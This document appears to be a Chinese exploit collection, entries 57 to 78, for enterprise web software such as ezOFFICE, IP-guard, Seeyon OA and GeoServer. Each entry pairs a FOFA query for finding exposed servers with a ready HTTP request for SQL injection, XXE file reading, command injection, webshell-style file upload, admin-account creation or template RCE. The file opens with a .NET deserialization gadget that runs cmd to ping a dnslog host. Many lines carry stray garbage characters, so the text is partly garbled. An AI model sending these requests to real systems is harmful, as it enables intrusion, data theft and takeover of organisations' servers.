* y9 \1 @2 P0 d" A2 z! \/ e- d
6 Q" a- T* Q: E9 k' d+ z{
; F. _* N* Q7 q$ q: m3 }* y "storeID":{
4 ~8 k. [2 T) R4 w1 F* {6 M "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
5 F2 R5 `( T) e! F$ k "MethodName":"Start",4 B, E& m/ A0 u; h1 q3 W
"ObjectInstance":{
9 Z! {9 y, M8 D5 S "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
( ?, x- W. P j+ ^/ w5 {0 t6 m( ~ "StartInfo": {- a* L5 w0 R: G! b/ v, k) L
"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",/ x/ U$ K+ D5 I3 C2 w. j8 G6 [4 B
"FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
, ]- z- f; J% N2 G0 H }
. y7 P- @; x! F6 {1 d) c) n }
_# [! g1 F( J: Z) {) }" a. l }
! a6 X5 w7 S! ]* `}) A8 o9 B0 X! ~! [5 }
2 b( \5 i' t) t; a& p% i: S* G) M+ e+ ?4 l% d
57. 畅捷通T+ keyEdit.aspx SQL注入' X+ t0 c+ `/ [' y s( C
FOFA:app="畅捷通-TPlus"
8 V3 G/ Q3 J! BGET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.15 t6 B% Z) {0 \4 c2 k0 R7 T/ x
Host: host
, P* o& G2 _7 J% C( |9 s( y: iUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
6 z+ \. G! C4 U$ \Accept-Charset: utf-8
& ]% N+ I6 R3 e: Q- HAccept-Encoding: gzip, deflate3 ^# \0 d6 \! n! r( x' h7 n$ O$ X
Connection: close$ \9 q" g* P) \" U! e" `0 ~
$ W# ?! _: b0 \
1 ` _$ d$ X' u' n& V58. 畅捷通T+ KeyInfoList.aspx sql注入" t" b% [* t. B" W& O) K
FOFA:app="畅捷通-TPlus"7 p: ?; z a3 @* c- |3 }
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
1 D: x5 p% k n* ]" q+ aHost: your-ip! S% A3 y. A# D |, V h
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
t6 \* i4 l+ l: z4 I* L- gAccept-Charset: utf-8- k8 O4 h. Z( E# n- r- H4 T
Accept-Encoding: gzip, deflate+ d. @9 W( O: O- x; q S" `
Connection: close
5 c4 a4 h% [. S' W. V' D
" L/ I* Q3 }! a' F& E4 Z2 ?- w! }" l
0 l3 o; L$ P% [) {' W, C2 [7 C59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
2 X7 d V$ k! d. g% P# F- cFOFA: title="@XETUX" && title="XPOS" && body="BackEnd"9 b) Q# E' f. a
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1. O$ q+ r+ ~7 Q4 ?- L
Host: 192.168.86.128:9090
, ~+ O" A$ H6 Q8 h1 ~User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36( ]. ?4 a- k$ S9 Q4 ?5 w
Connection: close
3 X% Y: o- k+ ?* y$ W; s( fContent-Length: 16696 d, o8 O5 W4 M5 P& K9 t4 o
Accept: */*
. @7 E j9 {: k9 E1 U- ^, |* F% XAccept-Language: en
9 z% B4 z) D2 ?8 }Content-Type: application/x-www-form-urlencoded3 E; r G- p* k
Accept-Encoding: gzip
. H: s( ]8 [! [- a$ X3 z& \* X0 g! a% k( v# d
PAYLOAD( E5 r" s: V& S5 r3 M1 h. {+ I" F
2 W' J, f# g1 H5 @+ [
7 r) I+ t; [. h+ \60. 百卓Smart管理平台 importexport.php SQL注入
0 `8 O" A/ h: W0 O9 L3 yFOFA:title="Smart管理平台"
. b; m$ _1 ?* [ ^GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1, h* R. K- H# k8 k$ x& w4 r
Host:
5 M2 H5 Q4 {/ lUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36; D. a1 Q# L2 A1 ^7 ~
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
- j5 X& M9 K$ N- X8 BAccept-Encoding: gzip, deflate+ ?( p( b0 _# x8 f! z
Accept-Language: zh-CN,zh;q=0.9' v2 N: O' h: U6 y- X* E% t; D
Connection: close
0 I0 W! O7 [8 p! `! S9 ?& t; Z5 x# X: A+ w3 Z, [# o2 k+ Y# O
2 }7 R. Z5 {7 m# y2 z- S
61. 浙大恩特客户资源管理系统 fileupload 任意文件上传
. \2 `0 y; _, k/ [7 Z' @% zFOFA: title="欢迎使用浙大恩特客户资源管理系统"9 V& k* e3 d2 I
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
5 n! o8 d1 Y Y8 b" x' M! R9 w. mHost: x.x.x.x
8 ?* X3 A4 n# c" C$ d1 @3 lUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.152 R4 D; {$ x! G
Connection: close
2 s) D( S8 U# _) V( [Content-Length: 27
7 s6 C8 t* n& UAccept: */*4 U4 ?5 z9 p, F8 m
Accept-Encoding: gzip, deflate
/ O% |) `+ O4 b% AAccept-Language: en
0 Y* C; o" |3 |- xContent-Type: application/x-www-form-urlencoded, J4 v9 b5 \- E
" V3 C! @0 ]2 O4 y+ ?0 K& [
8uxssX66eqrqtKObcVa0kid98xa
- @# Y9 S$ L* w; I
( U J# h1 b- M% `/ N
" A# U# g- e/ Z. T# B6 T; P2 Q) k62. IP-guard WebServer 远程命令执行( c4 j g) D: F5 R/ m
FOFA:"IP-guard" && icon_hash="2030860561") u4 m% n) q! @" X
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
5 E1 |) b8 l0 ^Host: x.x.x.x
3 x, v" ^& s" B- [User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
' q9 z6 p) v$ s9 X9 ~+ @. i1 dConnection: close$ ?3 \( ]3 l3 n( R: i* p
Accept: */*/ M& l; E1 V- `9 |9 }
Accept-Language: en
+ F- g- Q" a8 ~4 c! R+ B4 {Accept-Encoding: gzip
4 a' w o6 ^1 P; P0 h2 V# P$ a5 \% Q* {3 x! V
: l( B3 t; M! i8 ?5 l2 p访问
6 P }9 J+ N& R' v& R, l9 ]
+ T# I/ w$ y; v3 X- z! n l! ^GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1! \3 c* u0 x5 V7 q) s* Y
Host: x.x.x.x( [' e* c" F1 j2 W3 }! F# ~0 ]
* s( O" V1 B) ], O
9 G+ Y: t; X9 F/ c$ I1 L63. IP-guard WebServer任意文件读取
$ C1 l4 O. L3 W1 R, G) wIP-guard < 4.82.0609.0% \: t$ }8 v+ a- ]" D) a
FOFA:icon_hash="2030860561"
1 Y/ Q- ^8 p' BPOST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.17 r) Q8 V6 d' E' M
Host: your-ip m `' v3 c- p4 V1 B. c I0 n
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
/ B D; r j* i5 d, U1 FAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
; K6 u7 Z' D$ XAccept-Encoding: gzip, deflate: ~! g) w+ l6 L
Accept-Language: zh-CN,zh;q=0.9 ^5 ]- e: o$ a( m" H6 _6 v( r1 v
Connection: close. [1 K' `: n* x5 ~
Content-Type: application/x-www-form-urlencoded
0 T- {2 u/ }+ p/ G& k( S. Y1 F& ^+ O% |9 |6 ^ S3 T, F
path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A
8 [+ d3 Y# r+ S7 c3 f
& I+ W+ s8 G5 q+ z! ]- Z1 |64. 捷诚管理信息系统CWSFinanceCommon SQL注入
" ~( k6 A6 J, s& zFOFA:body="/Scripts/EnjoyMsg.js"' w# ~$ A' H. y2 n) ~
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1 `+ S( p: W/ Y6 E0 E* f1 g
Host: 192.168.86.128:9001& D" R3 V* Y6 [8 r
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
' l5 N# }1 i a2 f9 l8 [1 uConnection: close8 S* U1 u" m- s# ?2 h4 i7 O9 K
Content-Length: 369- G! X6 }% z6 M6 S
Accept: */*# D% ~2 M" ^" ^* Y! m7 X& R* ?
Accept-Language: en& B2 g- o7 |" j4 ?. M- I
Content-Type: text/xml; charset=utf-8- R: `3 n$ C0 D- ?6 i" z8 E
Accept-Encoding: gzip) w$ N6 c$ n0 n$ m' N( ]
9 X* y# M5 z( p8 h' m, i2 m' g$ F6 O
<?xml version="1.0" encoding="utf-8"?>
+ E6 }9 {5 n w; R O<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">6 V: E1 V; ~/ ]# h
<soap:Body>, s% R4 c) G# A3 r7 b6 g" j
<GetOSpById xmlns="http://tempuri.org/">9 v5 I$ W+ y* b* i' {9 [* E
<sId>1';waitfor delay '0:0:5'--+</sId>
0 N+ g* A5 [2 ]" |0 n" ~" h </GetOSpById>/ t$ ?2 Q+ E% v
</soap:Body>! Y1 X% J) Q2 @8 ~- [# j6 S
</soap:Envelope>
4 c) W. z/ f1 i: p& m
+ p1 _8 t3 z* D7 _ T
7 g) D% P4 F( ^5 E8 ]! p5 Q65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过% b. s2 K! c5 d7 [7 e0 C
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"2 ~& z' L, ?/ l/ u3 h2 S8 d
响应200即成功创建账号test123456/1234569 H( ]3 \9 t# p) V5 |+ m
POST /SystemMng.ashx HTTP/1.1
" N6 ~& K# w/ w9 fHost:
, V% `4 r. Q- TUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1): C" l; g) q! J' M+ J' j+ y0 \
Accept-Encoding: gzip, deflate
) F, O/ j- {, m y/ |Accept: */*
. z& }/ ^& }# M/ O p" F/ K0 |Connection: close
" t8 c+ \: R! b ?$ z0 l/ xAccept-Language: en
& N% f) y' K+ p( c8 H" k/ u. Q1 mContent-Length: 174
' Q$ Y: l7 A6 R" o) H' B
4 n! w4 T% X% O% WoperatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators
" D; o% U! m' f2 P
: ?4 |; Z$ k' D( N# t H0 s# [0 ?
) M! x) O, H* a* w' K0 ^' d66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入" A5 K# ^2 `- L6 I% D6 o0 T( y
FOFA:app="万户ezOFFICE协同管理平台"
i7 R) g1 [. I0 L) m2 ?) J: T/ B# c3 L, W4 G5 m5 r T2 E
GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
: u3 ^4 A, R6 j8 H7 OHost: x.x.x.x6 r9 E3 ^ L7 S. E) l7 n |& N
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36- r5 q' j- v* @
Connection: close. g+ m. N0 H8 {! T9 b7 B; ]. h
Accept: */*
# Q G* [$ C: a K' c0 ?Accept-Language: en2 b) D1 ?6 z0 }8 t/ r9 T
Accept-Encoding: gzip
( j5 f1 D1 e3 E1 d1 y* m) I* J, l
) c! r, G! E# l$ h! z( r6 V) i) C4 y/ l5 O0 d% [; F
第42,43行包含6cfe798ba8e5b85feb50164c59f4bec9字符串证明漏洞存在# ~% `$ Y0 R! ~: r* B- y
5 }4 P' a' L$ h8 t- d4 P3 J
67. 万户ezOFFICE wpsservlet任意文件上传4 T9 b- E8 a, }; ?+ Z, d
FOFA:app="万户网络-ezOFFICE"% P c; {2 y; c% s- B, m4 _
newdocId和filename参数表示写入文件名称,dir参数表示写入文件的路径,fileType参数表示文件类型
# [. y9 L7 l8 C# M! ~POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.13 K- E; t# J( y
Host: x.x.x.x
3 Y2 w4 Y& N R! A8 sUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0% t: I0 t, @2 m' A0 T1 m
Content-Length: 173
: C2 p+ ?/ C& {# G \$ _6 I; ^Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8% R0 W) S, _8 h, f# E- O% p2 Z6 L
Accept-Encoding: gzip, deflate
: M G& B: n- [7 d2 J5 ~$ QAccept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3% n" F" h7 W% O- o) ^: [& \
Connection: close
- A6 e. f4 E+ }9 m* SContent-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp) W3 x3 u* j' p: e0 _7 q
DNT: 19 c& a9 l: w) Z7 Z
Upgrade-Insecure-Requests: 1
1 T- N3 w4 j5 J( }! j
, k/ n' `7 u& c, L" L3 W) a# p--ufuadpxathqvxfqnuyuqaozvseiueerp' n7 S, O2 e- |6 T" e+ M
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"
6 D! W! P3 a6 O2 s1 x: K7 N6 |/ i/ }1 y" u+ x p: g
<% out.print("sasdfghjkj");%> ?7 s8 k+ B- k5 Y1 K6 T
--ufuadpxathqvxfqnuyuqaozvseiueerp--
2 d" k Q( c$ B, a* `6 g# c$ u/ Y- G/ r5 O2 w9 Z, ?+ z' D8 ]4 b1 V
9 ?# \; Y. P7 ~$ F. A
文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp* l0 {+ _2 t, q* F2 I5 }
! T2 [* J1 l' ^68. 万户ezOFFICE wf_printnum.jsp SQL注入- S2 e4 c# ]1 |# w
FOFA:app="万户ezOFFICE协同管理平台"
8 Q2 R; n6 y( g6 ~; B d# y. B2 b @7 aGET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1 e3 Z8 X1 k8 A9 R3 @+ w: |1 Y
Host: {{host}}
, u, A" ?! Q0 G" g/ B" z! i, y' KUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
/ e5 Y! k E0 H) wAccept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.87 d/ X1 t- \' O- S$ N ]
Accept-Encoding: gzip, deflate
+ p2 M5 u$ N+ d" L% AAccept-Language: zh-CN,zh;q=0.9
9 J4 } K& J( A% j, Z' cConnection: close* Q; o0 k/ }+ x
% U6 v' d) q0 |: G7 F3 H
- M% ]3 Y3 U$ D. a* s' g: Q69. 万户 ezOFFICE contract_gd.jsp SQL注入9 q9 g1 U" o" }! U8 _+ y3 e% R
FOFA:app="万户ezOFFICE协同管理平台"
4 u ^! r; P$ i8 T& n# aGET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.16 I0 L8 X) X' T! G0 f G; k' d1 @
Host: your-ip
8 j0 Z' t- c4 L% w ?User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36# ^; O+ c* @* k+ n# z8 S$ V
Accept-Encoding: gzip, deflate5 c" j. g& m& @* q9 e6 B; |
Accept: */*
: [) C" O, p; [# G& w+ RConnection: keep-alive+ R; t) U* I$ Y
6 I1 a6 O+ \' C5 O+ S0 Q
" i, u/ a. A A8 a8 U( k' k
70. 万户ezEIP success 命令执行" r5 C3 I2 T- Y# R
FOFA:app="万户网络-ezEIP"9 J; s; p& C |" j, J
POST /member/success.aspx HTTP/1.1' a1 ~) E- Z% [- D% T
Host: {{Hostname}}
2 c. y1 I) n3 Y! g4 r1 PUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
9 |# X. W% v$ ]7 \0 r6 ]0 Q$ A+ }SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=, g" ?( D/ ~7 d1 @* [
Content-Type: application/x-www-form-urlencoded2 n* M6 o9 `3 `2 ^, W' h
TYPE: C, X* ` V2 A& c: k( h' e V/ @8 B
Content-Length: 16702# b% m) N0 d' F# P& L/ [ l
2 l Z# {! Q4 Q3 d7 b__VIEWSTATE=PAYLOAD" q; |" O" w( h+ y
+ q7 ?- B0 m+ m2 X r6 G
* N. k' y& l/ R3 t( F2 ]- t @: F! p71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入$ P- R2 k8 ?3 ^' O" ^0 d
FOFA:body="PM2项目管理系统BS版增强工具.zip"2 j4 I* S* W( [, |6 b1 A1 E
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
( O* p" A' y; H5 v/ fHost: x.x.x.xx.x.x.x) [" ^0 @2 U3 y S* q3 n) u
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
% ^4 @' [6 e5 z% c* mConnection: close1 g. _8 c; n* R* y2 M- E. n
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8% C) q% s! M2 A3 ^6 p
Accept-Encoding: gzip, deflate/ P* t( q: H/ P0 Z$ u
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
6 R6 g2 |$ M6 E, A8 X; N) RUpgrade-Insecure-Requests: 1
; {& R* _$ q9 d9 l
! f3 Q. l- z A! j" j T Y6 R( H( i: W: {! W) b. e: `
72. 致远OA getAjaxDataServlet XXE$ l! n0 v' U1 B' ?1 h- F# g
FOFA:app="致远互联-OA"
8 @7 s& E4 D/ A3 w- _' v# }; ~POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
( e2 R; K* ^& L- n$ n! z( s( [! oHost: 192.168.40.131:8099! A6 I* \3 X" k7 \: h1 w/ T
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
2 [$ O$ \( r A+ A* }3 X% x- [; JConnection: close
& Y7 ~; R4 H7 o1 hContent-Length: 583
& x7 V& S h0 k1 YContent-Type: application/x-www-form-urlencoded
Q. Y" d1 X- q# QAccept-Encoding: gzip0 \: T# i4 M+ C. u
; {4 T. A- ] O/ Z$ d' ~* KS=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E
0 J( |0 z! y# _% P
/ N" Z) p* M$ U$ N
& u. s' c. ?! _" d1 Z% E9 x73. GeoServer wms远程代码执行. D9 T" P3 ^1 S
FOFA:icon_hash=”97540678”0 S5 I1 x) |3 ^' O7 _4 ]
POST /geoserver/wms HTTP/1.1
3 x* l% N& P9 ^6 H: WHost:7 R) Q7 |, m0 E3 s% l
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
& h! q, Z5 E" U6 q) N( r. LContent-Length: 19812 U j d( ?6 n( u" K
Accept-Encoding: gzip, deflate
5 w0 O" [. ?% ?1 T7 W' XConnection: close& A* ]1 L1 a5 m5 d. V
Content-Type: application/xml
( f7 T# D1 P: \2 i6 }SL-CE-SUID: 3
" H+ A$ m# I0 h! U- E7 I! Z, l) X _. z$ s1 `) M! \
PAYLOAD4 H' z+ b I: R
5 ~5 {7 Q2 q% N6 ] R
9 {2 E& r1 i. t5 v) f l' k74. 致远M3-server 6_1sp1 反序列化RCE* A; e1 i) r5 a+ `2 E
FOFA:title="M3-Server"2 E/ X/ W% l9 L; @( ^; q
PAYLOAD! X3 J' n6 ~" P/ K ]" i
- O+ Y( j! l7 g4 m& h75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE
; {1 N) F: |0 L. }% pFOFA:app="TELESQUARE-TLR-2005KSH"/ d# X% y) j2 r# E8 Z
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1, f. z# ?/ i5 L9 j
Host: x.x.x.x* H% u# X' N, T4 e6 U3 V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.366 @# ]* d! W$ H3 |( l" v
Connection: close
! K3 W+ Z4 _2 Y6 G$ B2 I- i, HAccept: */*
; f1 T- T" D! {2 P" h( x2 @, ^5 }Accept-Language: en
, i" {$ t" X. `1 iAccept-Encoding: gzip' O U$ {/ L2 ~( S/ _! g
$ y2 `: C" C' ^9 T9 s
9 U' U$ y% _% m# a t: \# s: C
GET /cgi-bin/test28256.txt HTTP/1.1
+ Q3 ?& W$ ~, s3 I, W2 O- `Host: x.x.x.x
# \7 h9 a2 s1 _/ v8 h- z# P T
: n- _- |" p6 p0 Q
0 F0 ?. `' P0 T76. 新开普掌上校园服务管理平台service.action远程命令执行/ d u, ^1 P2 P
FOFA:title="掌上校园服务管理平台"' k4 u% V$ ~9 Q, x* F, @
POST /service_transport/service.action HTTP/1.1# P6 v5 T1 i1 \! S
Host: x.x.x.x
5 K9 s+ u$ X7 LUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0( y X- t8 u9 u! @
Connection: close
/ J9 V; b% o0 w; |) l( VContent-Length: 211
! G: s. G+ M& X; O/ }9 _- G8 k( dAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.89 z1 N1 b& |2 p ~- _: c% y
Accept-Encoding: gzip, deflate$ q+ T6 k: m+ f
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
4 g5 K0 U7 M) ~6 w# J4 vCookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
. V# {. O. _1 d" M; ]! }, `1 aUpgrade-Insecure-Requests: 1
k& W/ r" {) a" z3 Q. H9 _! G3 @, e/ V* R6 U% l+ x
{
, O7 P% m. b j( l& C( \# ~"command": "GetFZinfo",
& G: t# \; n' w1 y" t S- f "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"8 z& a+ Z: M3 `' k( U* K
?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
+ G& [6 m" w$ X1 ?}
& ^- `( B# Q9 s# l. p
* u% c, V$ y: _+ V) h8 q+ q
4 Y, ]' q1 [& V% a; RGET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1' ?+ P* i2 S7 N" Q4 l* a
Host: x.x.x.x8 f1 u# H6 a9 D( ^+ G
% J- w& V" l# j. g# ]
: H x0 z/ R% u
* H8 Y4 q. F8 Q77. F22服装管理软件系统UploadHandler.ashx任意文件上传4 y% A' g! ?. ?5 b9 c! X$ D
FOFA:body="F22WEB登陆"' ~+ w5 |4 r- Q) Y2 ]" |
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
$ A4 u! \# o8 Q9 S4 C: v) nHost: x.x.x.x \( E& j" z9 c6 Z# |
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
4 |& C. ?" j7 R$ kConnection: close
j2 g% j1 S' ~' r% k5 w$ }Content-Length: 433
( f2 p w% M; Z3 y3 f8 [* CAccept: */*! K5 b3 ~( r U$ H& ]
Accept-Encoding: gzip, deflate
) e( n5 k ^3 m1 _: l1 |+ hAccept-Language: zh-CN,zh;q=0.9
) }' ]( L% X! f( ~Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix
3 r) q2 G9 m; m# X3 }! m2 i% u7 B' `. }: _: S" G
------------398jnjVTTlDVXHlE7yYnfwBoix
# i6 [- H5 j% [* q4 u/ Q, `Content-Disposition: form-data; name="folder"# O1 J! q: S; V# q, i5 I# Y
: X* N7 M) \6 }* _/upload/udplog
% z" d7 N0 Y, X/ l C------------398jnjVTTlDVXHlE7yYnfwBoix8 L/ |9 G2 |6 x U$ v
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"" }: i! Q9 r% Q* k) ]
Content-Type: application/octet-stream( p" ?1 g0 p2 q( K6 h9 n
7 {3 @5 y \" i4 k! e! vhello1234567$ Z: p% e& Z! q( c
------------398jnjVTTlDVXHlE7yYnfwBoix
+ L& S' a5 U, d$ C& X! gContent-Disposition: form-data; name="Upload"
8 A$ O, h2 x/ K6 I; G2 i8 @5 W3 z9 Z, G$ E) e3 j
Submit Query
6 x2 v$ D1 d: n) O3 k1 ~+ i------------398jnjVTTlDVXHlE7yYnfwBoix--
3 F2 T' R; b- U0 z
\& a# D( j: q
9 x5 W6 N2 _! H" i( ~4 c |78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
2 O$ F7 N' M3 H" i. E6 t* l6 ]4 y4 f1 fFOFA:icon_hash="2001627082"
8 Q/ Z; i7 q4 r' u( CPOST /Platform/System/FileUpload.ashx HTTP/1.1; }: Z$ I3 f0 S. u
Host: x.x.x.x
) h, _0 K( S1 C( E- b- EUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.157 U* k" o+ F) |5 A
Connection: close. {/ y3 l5 {' _; }6 {
Content-Length: 336( ^2 O9 A* T8 B4 L
Accept-Encoding: gzip
& H4 B, }% A+ I! o" [$ H$ u2 jContent-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l
! G3 H6 }& L+ I, U0 D4 I- Y' u+ _/ {
% z% E3 y0 |7 Z2 ]------YsOxWxSvj1KyZow1PTsh98fdu6l
, C/ Y0 d4 `, E7 P& L# sContent-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt") _& @5 U/ q( l( H7 H
Content-Type: image/png; G) }0 ^# Q6 T: ^& S/ _8 p: x D
. l/ s+ v* X4 f' N9 GYsOxWxSvj1KyZow1PTsh98fdu6l
; [6 a7 m1 R* v3 s------YsOxWxSvj1KyZow1PTsh98fdu6l A' v( e `* \. U' E
Content-Disposition: form-data; name="target", A4 A% t9 O' J9 s# e( }% U- r
m' v, J- {3 `$ @7 @
/Applications/SkillDevelopAndEHS/0 d0 q1 O6 s0 k1 K( b
